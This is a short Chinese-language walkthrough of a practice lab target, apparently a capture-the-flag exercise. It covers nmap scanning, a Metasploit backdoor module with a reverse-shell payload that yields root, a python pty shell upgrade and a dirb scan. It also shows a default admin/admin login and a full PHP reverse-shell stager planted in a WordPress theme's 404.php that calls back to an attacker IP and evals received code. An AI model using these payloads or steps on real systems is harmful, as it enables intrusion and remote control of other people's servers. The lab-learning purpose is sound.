靶场:
和彩云 提取码:hEKo
攻击机:192.168.106.131
1.进行目标主机探测 nmap 192.168.106.1/24
2.nmap -sV -v -T4 192.168.106.129 扫描目标服务版本详细信息
2.使用searchsploit [服务版本] 查看有没有可利用的漏洞
发现了两个利用信息,接下来为了省事(太菜了)使用metssploit进行利用
这里使用4号建立后门模块
- use 4
- show payloads 查看可用payload
- set payload 3 cmd/unix/reverse 设置反弹shellpayload
- show options 查看需要设置的信息,并填写
- run 执行远程溢出命令
成功拿到目标shell,而且还是root权限的😁
使用
python -c "import pty;pty.spawn('/bin/bash')"
优化shell
3.接下来进入root目录下拿到flag就ok啦
a.回想一下,进行目标端口扫描时发现目标还开启了80端口,那么😁
b.使用dirb http://192.168.106.129 对目标进行目录扫描
发现管理登入界面
c.进行简单尝试后发现 admin admin 居然进了😁
c.在目标404界面插入反弹shell代码
/*<?php /**/ error_reporting(0); $ip = '192.168.106.131'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
注意点击上传
d.在msfconsole中启动监听
然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php访问webshell
不知道为什么不能成功😌(以后再来把)